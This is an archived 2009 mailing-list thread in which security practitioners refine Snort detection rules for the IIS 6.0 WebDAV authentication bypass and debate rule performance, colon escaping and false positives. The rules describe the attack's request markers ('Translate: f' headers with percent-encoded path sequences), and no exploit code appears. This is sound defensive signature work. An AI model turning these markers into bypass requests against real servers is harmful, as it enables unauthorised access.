	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<314cf0830905201741o1b211c70o526e196017745a3d@mail.gmail.com>
	<1242866949.97653.35.camel@localhost>
	<314cf0830905201756q445d743era74da741213a0e66@mail.gmail.com>
Message-ID: <1242867913.97653.43.camel@localhost>

On Wed, 2009-05-20 at 20:56 -0400, Joel Esler wrote:

> When Snort starts, (this is going to be basic), Snort looks at the
> ruleset and memorizes the longest content match within the rule.  This
> content match is then used within the engine for the FP matcher.  
> 
> My personal theory, (and this is why i want a big pcap to test with),
> is that doing a content match for "GET" and "POST" would be pointless,
> and actually slower than having a rule without it, since GET or POST
> is probably not going to be the longest content match.  (not
> everytime, but most likely.)  This is actually generating ANOTHER
> step, which will slow the engine down, not significantly, but it
> should be slower than without.  

Sounds like the engine is broken ;)  Wouldn't it make more sense to
start with that match that has the least CPU expense? That being figured
by the length of the string in relation to the search space (depth or
within)? 

Just playing arm-chair optimizer here. I'm sure the pros have poured
over optimizing Snort a gazillion times. And I understand the reason for
using the longest match first. I just don't understand why the depth of
the search space wouldn't be considered. (and matching "GET " without
any sliding saerchspace [depth|within=4] is pretty much the ideal
content match, is it not?)

Cheers,
Frank



-- 
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090520/dcfb8134/attachment.bin

From jgimer at gmail.com  Wed May 20 21:24:47 2009
From: jgimer at gmail.com (Joshua Gimer)
Date: Wed, 20 May 2009 19:24:47 -0600
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242865846.97653.27.camel@localhost>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
Message-ID: <cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>

Wouldn't performing a content match on GET not really provide that
much of a benefit in that it narrows down the rule to 70% of web
traffic? That is why the content match was done on "Translate"
instead; it is required using this method to be successful. As far as
escaping the colons in the pcre match, I cannot see why this would
matter (please let me know if I am missing something). "Translate: f"
alone does not indicate that the attack is being carried out, it is
this in combination with a unicode sequence within the request that
indicates that the attack is under way.

Adapting the rules to other methods should be easy enough, maybe something like:

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
rev:1;)

If I am missing something please let me know, and thanks to everyone
for their input. :)

Josh

On Wed, May 20, 2009 at 6:30 PM, Frank Knobbe <frank at knobbe.us> wrote:
> On Tue, 2009-05-19 at 18:20 -0600, Joshua Gimer wrote:
>> Well that it good and all, but if you want something a little more
>> specific in the alert msg here is a (minimally) optimized GET method
>> rule:
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
>> Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
>> pcre:"/GET.*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
>> reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
>> rev:1;)
>
> Not like that :)
>
> Add a " content:"GET "; depth:4; " to the beginning to help performance.
> The colons in the content and pcre match are not escaped. Are you sure
> the second pcre is necessary?
>
> How about:
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS
> (msg:"CURRENT_EVENTS IIS6.0 WebDav RemoteAuth Bypass - GET METHOD";
> flow:to_server,established; content:"GET "; depth:4; content:"Translate|
> 3a| f"; nocase; pcre:"/GET.*%..%.*HTTP/Bi";
> classtype:web-application-attack;
> reference:url,isc.sans.org/diary.html?storyid=6397; sid:xxxxxxxx;
> rev:1;)
>
> And of course one for POST, HEAD, and perhaps COPY, MOVE and DAV?
>
> -Frank
>
>



-- 
Thx
Joshua Gimer

From frank at knobbe.us  Wed May 20 21:34:34 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 20 May 2009 20:34:34 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
Message-ID: <1242869674.97653.50.camel@localhost>

On Wed, 2009-05-20 at 19:24 -0600, Joshua Gimer wrote:
> Wouldn't performing a content match on GET not really provide that
> much of a benefit in that it narrows down the rule to 70% of web
> traffic?

It narrows the rule to web requests, that's the point. If you look at
other rules, we always use the GET and/or POST checks. Originally idea
was about performance improvement. The thinking was that it is less
expense to check for "GET "; offset:0; depth:4; (just a single match if
those 4 bytes are in the first, well, 4 bytes of the packet) than
running a check on "Translate" *anywhere* in the packet. (Is "translate"
present at offset 0? No, how about offset 1? no, how about offset 2? No,
how about... 

Anyway, Joel just brought that discussion up again. I think putting that
theory to the test will be good. Although if I remember correctly, that
added check was added back when we ran submissions through the
TurboSnort rules thingy to gauge rule performance.

>  As far as
> escaping the colons in the pcre match, I cannot see why this would
> matter (please let me know if I am missing something).

Doesn't your Snort complain about a parsing error? (Oh wait, the newer
versions don't complain, they just ignore the rule, right? :)

Any colon has to be escaped in content and pcre matches. Or written as 
|3a|. That's always been like that. 


Cheers,
Frank


-- 
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090520/7bbd4bd8/attachment.bin

From jgimer at gmail.com  Wed May 20 21:45:11 2009
From: jgimer at gmail.com (Joshua Gimer)
Date: Wed, 20 May 2009 19:45:11 -0600
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242869674.97653.50.camel@localhost>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
	<1242869674.97653.50.camel@localhost>
Message-ID: <cf939bff0905201845u2d5ed646r422d3408eb7634b4@mail.gmail.com>

Not trying to argue but Snort doesn't complain about the colon when I
use it, and I know that it doesn't discard the rule
(tested/matches/alerts).

On Wed, May 20, 2009 at 7:34 PM, Frank Knobbe <frank at knobbe.us> wrote:
> Doesn't your Snort complain about a parsing error? (Oh wait, the newer
> versions don't complain, they just ignore the rule, right? :)
>
> Any colon has to be escaped in content and pcre matches. Or written as
> |3a|. That's always been like that.
>
>
> Cheers,
> Frank
>
>


-- 
Thx
Joshua Gimer

From frank at knobbe.us  Wed May 20 21:46:20 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 20 May 2009 20:46:20 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <cf939bff0905201845u2d5ed646r422d3408eb7634b4@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
	<1242869674.97653.50.camel@localhost>
	<cf939bff0905201845u2d5ed646r422d3408eb7634b4@mail.gmail.com>
Message-ID: <1242870380.97653.51.camel@localhost>

On Wed, 2009-05-20 at 19:45 -0600, Joshua Gimer wrote:
> Not trying to argue but Snort doesn't complain about the colon when I
> use it, and I know that it doesn't discard the rule
> (tested/matches/alerts).

What version of Snort are you using?


-Frank



-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090520/e8f85175/attachment.bin

From jgimer at gmail.com  Wed May 20 21:56:09 2009
From: jgimer at gmail.com (Joshua Gimer)
Date: Wed, 20 May 2009 19:56:09 -0600
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242870380.97653.51.camel@localhost>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
	<1242869674.97653.50.camel@localhost>
	<cf939bff0905201845u2d5ed646r422d3408eb7634b4@mail.gmail.com>
	<1242870380.97653.51.camel@localhost>
Message-ID: <cf939bff0905201856y35f825a8y7740bff79cb20179@mail.gmail.com>

Version 2.8.3.2 (Build 22)

Initializing rule chains...
6633 Snort rules read
    6633 detection rules
    0 decoder rules
    0 preprocessor rules
6633 Option Chains linked into 339 Chain Headers
0 Dynamic rules


On Wed, May 20, 2009 at 7:46 PM, Frank Knobbe <frank at knobbe.us> wrote:
> On Wed, 2009-05-20 at 19:45 -0600, Joshua Gimer wrote:
>> Not trying to argue but Snort doesn't complain about the colon when I
>> use it, and I know that it doesn't discard the rule
>> (tested/matches/alerts).
>
> What version of Snort are you using?
>
>
> -Frank
>
>
>
>



-- 
Thx
Joshua Gimer

From frank at knobbe.us  Wed May 20 21:59:55 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 20 May 2009 20:59:55 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
Message-ID: <1242871195.97653.55.camel@localhost>

On Wed, 2009-05-20 at 19:24 -0600, Joshua Gimer wrote:
> Adapting the rules to other methods should be easy enough, maybe something like:
> 
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
> pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
> reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
> rev:1;)


I just ran it for a 3 minutes on my sensors and had to immediately pull
it :)  Sorry, just way too many FP's since it fires on legitimate
encodings (like "help%20%20me"  :)


Sorry, as I had thought yesterday, we need sigs for the dangerous
Unicode versions. %..%.. simply isn't cutting it :)


Cheers,
Frank


PS: That said, the VRT rule created more FP's :)


-- 
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090520/94defbbb/attachment.bin

From spooker at gmail.com  Thu May 21 00:26:56 2009
From: spooker at gmail.com (Rodrigo Montoro(Sp0oKeR))
Date: Thu, 21 May 2009 01:26:56 -0300
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242871195.97653.55.camel@localhost>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com> 
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com> 
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> 
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com> 
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com> 
	<1242871195.97653.55.camel@localhost>
Message-ID: <9255886c0905202126i779c71d9o4ec069cfea4cecb8@mail.gmail.com>

Since I saw them at snort 2.8.3 release I never see people using them
to create rules (thats include myself).

2008-09-04 - Snort 2.8.3

[*] New Additions
    * New Feature for HTTP Inspect to split requests into 5 components -
      Method, URI, Header (non-cookie), Cookies, Body.



http_method ( http://www.snort.org/docs/snort_htmanuals/htmanual_284/node257.html
) keyword and http_headers (
http://www.snort.org/docs/snort_htmanuals/htmanual_284/node254.html )
.

My question is: don't those keywords improve performance ?


Regards,


On Wed, May 20, 2009 at 10:59 PM, Frank Knobbe <frank at knobbe.us> wrote:
> On Wed, 2009-05-20 at 19:24 -0600, Joshua Gimer wrote:
>> Adapting the rules to other methods should be easy enough, maybe something like:
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
>> Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
>> pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
>> reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
>> rev:1;)
>
>
> I just ran it for a 3 minutes on my sensors and had to immediately pull
> it :) ?Sorry, just way too many FP's since it fires on legitimate
> encodings (like "help%20%20me" ?:)
>
>
> Sorry, as I had thought yesterday, we need sigs for the dangerous
> Unicode versions. %..%.. simply isn't cutting it :)
>
>
> Cheers,
> Frank
>
>
> PS: That said, the VRT rule created more FP's :)
>
>
> --
> It is said that the Internet is a public utility. As such, it is best
> compared to a sewer. A big, fat pipe with a bunch of crap sloshing
> against your ports.
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>



-- 
===========================
Rodrigo Montoro (Sp0oKeR)
http://www.spooker.com.br
http://www.snort.org.br
http://www.linkedin.com/in/spooker
===========================

From eslerj at gmail.com  Thu May 21 08:51:18 2009
From: eslerj at gmail.com (Joel Esler)
Date: Thu, 21 May 2009 08:51:18 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242867913.97653.43.camel@localhost>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<314cf0830905201741o1b211c70o526e196017745a3d@mail.gmail.com>
	<1242866949.97653.35.camel@localhost>
	<314cf0830905201756q445d743era74da741213a0e66@mail.gmail.com>
	<1242867913.97653.43.camel@localhost>
Message-ID: <314cf0830905210551p2bdcc1dh4bb1d45c56930980@mail.gmail.com>

On Wed, May 20, 2009 at 9:05 PM, Frank Knobbe <frank at knobbe.us> wrote:

> On Wed, 2009-05-20 at 20:56 -0400, Joel Esler wrote:
>
> > When Snort starts, (this is going to be basic), Snort looks at the
> > ruleset and memorizes the longest content match within the rule.  This
> > content match is then used within the engine for the FP matcher.
> >
> > My personal theory, (and this is why i want a big pcap to test with),
> > is that doing a content match for "GET" and "POST" would be pointless,
> > and actually slower than having a rule without it, since GET or POST
> > is probably not going to be the longest content match.  (not
> > everytime, but most likely.)  This is actually generating ANOTHER
> > step, which will slow the engine down, not significantly, but it
> > should be slower than without.
>
> Sounds like the engine is broken ;)  Wouldn't it make more sense to
> start with that match that has the least CPU expense? That being figured
> by the length of the string in relation to the search space (depth or
> within)?
>
> Just playing arm-chair optimizer here. I'm sure the pros have poured
> over optimizing Snort a gazillion times. And I understand the reason for
> using the longest match first. I just don't understand why the depth of
> the search space wouldn't be considered. (and matching "GET " without
> any sliding saerchspace [depth|within=4] is pretty much the ideal
> content match, is it not?)


No, as you said, the guys in devel has poured over this a gazillion times,
and continually do so, as speed is one of the greatest factors of
competition in our industry.  Matching the longest content string through
the FPM, simply finds the rule to run, then the rule is run against the
packet (or flowbit string, or stream, or whatever), the FPM is just the
pre-qualification step against billions of packets a second.

This is why, in theory, doing a GET wouldn't do any speed enhancements.


-- 
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090521/0114a35b/attachment.html

From eslerj at gmail.com  Thu May 21 08:52:19 2009
From: eslerj at gmail.com (Joel Esler)
Date: Thu, 21 May 2009 08:52:19 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <9255886c0905202126i779c71d9o4ec069cfea4cecb8@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
	<1242871195.97653.55.camel@localhost>
	<9255886c0905202126i779c71d9o4ec069cfea4cecb8@mail.gmail.com>
Message-ID: <314cf0830905210552h16d16f45of44eece2cbe3812e@mail.gmail.com>

On Thu, May 21, 2009 at 12:26 AM, Rodrigo Montoro(Sp0oKeR) <
spooker at gmail.com> wrote:

> Since I saw them at snort 2.8.3 release I never see people using them
> to create rules (thats include myself).
>
> 2008-09-04 - Snort 2.8.3
>
> [*] New Additions
>    * New Feature for HTTP Inspect to split requests into 5 components -
>      Method, URI, Header (non-cookie), Cookies, Body.
>
>
>
> http_method (
> http://www.snort.org/docs/snort_htmanuals/htmanual_284/node257.html
> ) keyword and http_headers (
> http://www.snort.org/docs/snort_htmanuals/htmanual_284/node254.html )
> .
>
> My question is: don't those keywords improve performance ?
>
>
>
Something else I will be happy to test for everyone in my test lab, if
someone can capture a big pcap of HTTP.

Full Snaplength too!



-- 
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090521/e32d5de3/attachment.html

From eslerj at gmail.com  Thu May 21 08:54:19 2009
From: eslerj at gmail.com (Joel Esler)
Date: Thu, 21 May 2009 08:54:19 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242871195.97653.55.camel@localhost>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
	<1242871195.97653.55.camel@localhost>
Message-ID: <314cf0830905210554w76d113e5gf871863371609aa1@mail.gmail.com>

On Wed, May 20, 2009 at 9:59 PM, Frank Knobbe <frank at knobbe.us> wrote:

> On Wed, 2009-05-20 at 19:24 -0600, Joshua Gimer wrote:
> > Adapting the rules to other methods should be easy enough, maybe
> something like:
> >
> > alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> > Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
> > pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
> > reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
> > rev:1;)
>
>
> I just ran it for a 3 minutes on my sensors and had to immediately pull
> it :)  Sorry, just way too many FP's since it fires on legitimate
> encodings (like "help%20%20me"  :)
>
>
> Sorry, as I had thought yesterday, we need sigs for the dangerous
> Unicode versions. %..%.. simply isn't cutting it :)
>
>
> This is why the http_inspect preprocessor was recommended, there isn't need
for a rule in this situation, there is need for code already in place.  The
same reason why writing rules for USER.*{100} in FTP rules is stupid, the
ftp preprocessor does this for you.



-- 
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090521/d1d0e2b1/attachment.html

From eslerj at gmail.com  Thu May 21 08:59:04 2009
From: eslerj at gmail.com (Joel Esler)
Date: Thu, 21 May 2009 08:59:04 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242869674.97653.50.camel@localhost>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
	<1242869674.97653.50.camel@localhost>
Message-ID: <314cf0830905210559v65621d42rcde1bee3e72ea8ec@mail.gmail.com>

On Wed, May 20, 2009 at 9:34 PM, Frank Knobbe <frank at knobbe.us> wrote:

> On Wed, 2009-05-20 at 19:24 -0600, Joshua Gimer wrote:
> > Wouldn't performing a content match on GET not really provide that
> > much of a benefit in that it narrows down the rule to 70% of web
> > traffic?
>
> It narrows the rule to web requests, that's the point. If you look at
> other rules, we always use the GET and/or POST checks. Originally idea
> was about performance improvement. The thinking was that it is less
> expense to check for "GET "; offset:0; depth:4; (just a single match if
> those 4 bytes are in the first, well, 4 bytes of the packet) than
> running a check on "Translate" *anywhere* in the packet. (Is "translate"
> present at offset 0? No, how about offset 1? no, how about offset 2? No,
> how about...
>
> Anyway, Joel just brought that discussion up again. I think putting that
> theory to the test will be good. Although if I remember correctly, that
> added check was added back when we ran submissions through the
> TurboSnort rules thingy to gauge rule performance.


TurboSnort's speed tests are not correct, for many reasons, I suggest you
don't use it.  The only true measure of performance is how the rule will
run, on YOUR system, with YOUR version of Snort under YOUR compile of GCC
(amongst whatever else causes issues of speed on your machine).  That's why
perfmonitor was built in with rule and preprocessor speed stats.  Use it.


>
>
> >  As far as
> > escaping the colons in the pcre match, I cannot see why this would
> > matter (please let me know if I am missing something).
>
> Doesn't your Snort complain about a parsing error? (Oh wait, the newer
> versions don't complain, they just ignore the rule, right? :)


Depends on the error, but for the most part Frank, you are correct.  The
engine coming up is more important than a badly coded rule.  Which is why
the -T exists.


> Any colon has to be escaped in content and pcre matches. Or written as
> |3a|. That's always been like that.


Colon, Double Quote, Single Quote, and Semicolon.  These four have to be
escaped (or written in hex, which is preferred)



-- 
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090521/ec4d06dc/attachment-0001.html

From eslerj at gmail.com  Thu May 21 09:00:15 2009
From: eslerj at gmail.com (Joel Esler)
Date: Thu, 21 May 2009 09:00:15 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <cf939bff0905201856y35f825a8y7740bff79cb20179@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
	<1242869674.97653.50.camel@localhost>
	<cf939bff0905201845u2d5ed646r422d3408eb7634b4@mail.gmail.com>
	<1242870380.97653.51.camel@localhost>
	<cf939bff0905201856y35f825a8y7740bff79cb20179@mail.gmail.com>
Message-ID: <314cf0830905210600v27005c8ds96114e3e5c2496e3@mail.gmail.com>

On Wed, May 20, 2009 at 9:56 PM, Joshua Gimer <jgimer at gmail.com> wrote:

> Version 2.8.3.2 (Build 22)
>
> Initializing rule chains...
> 6633 Snort rules read
>    6633 detection rules
>    0 decoder rules
>    0 preprocessor rules
> 6633 Option Chains linked into 339 Chain Headers
> 0 Dynamic rules
>
>
I'm only going to say this once, since I say it about 300x a day, stop using
packages (if you are), compile from scratch (which you should be) and stay
current (2.8.4.1).

J



-- 
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090521/912ba76b/attachment.html

From frank at knobbe.us  Thu May 21 09:38:20 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Thu, 21 May 2009 08:38:20 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <314cf0830905210559v65621d42rcde1bee3e72ea8ec@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
	<1242869674.97653.50.camel@localhost>
	<314cf0830905210559v65621d42rcde1bee3e72ea8ec@mail.gmail.com>
Message-ID: <1242913100.6787.2.camel@localhost>

On Thu, 2009-05-21 at 08:59 -0400, Joel Esler wrote:

> TurboSnort's speed tests are not correct, for many reasons, I suggest
> you don't use it. 

Uhm, we stopped using that years ago... Are they even still around? Last
time I checked (2005?) they were offline...

-Frank


-- 
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090521/926d4ffc/attachment.bin

From eslerj at gmail.com  Thu May 21 09:40:21 2009
From: eslerj at gmail.com (Joel Esler)
Date: Thu, 21 May 2009 09:40:21 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242913100.6787.2.camel@localhost>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<cf939bff0905201824q29feceb8uc21d6d85ad84e01c@mail.gmail.com>
	<1242869674.97653.50.camel@localhost>
	<314cf0830905210559v65621d42rcde1bee3e72ea8ec@mail.gmail.com>
	<1242913100.6787.2.camel@localhost>
Message-ID: <314cf0830905210640h53cf208fmcb8f1899fb3498ad@mail.gmail.com>

On Thu, May 21, 2009 at 9:38 AM, Frank Knobbe <frank at knobbe.us> wrote:

> On Thu, 2009-05-21 at 08:59 -0400, Joel Esler wrote:
>
> > TurboSnort's speed tests are not correct, for many reasons, I suggest
> > you don't use it.
>
> Uhm, we stopped using that years ago... Are they even still around? Last
> time I checked (2005?) they were offline...
>


I haven't checked in an equal amount of time :).  I was just suggesting an
FYI for the perfmon.



-- 
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090521/15f806b8/attachment.html

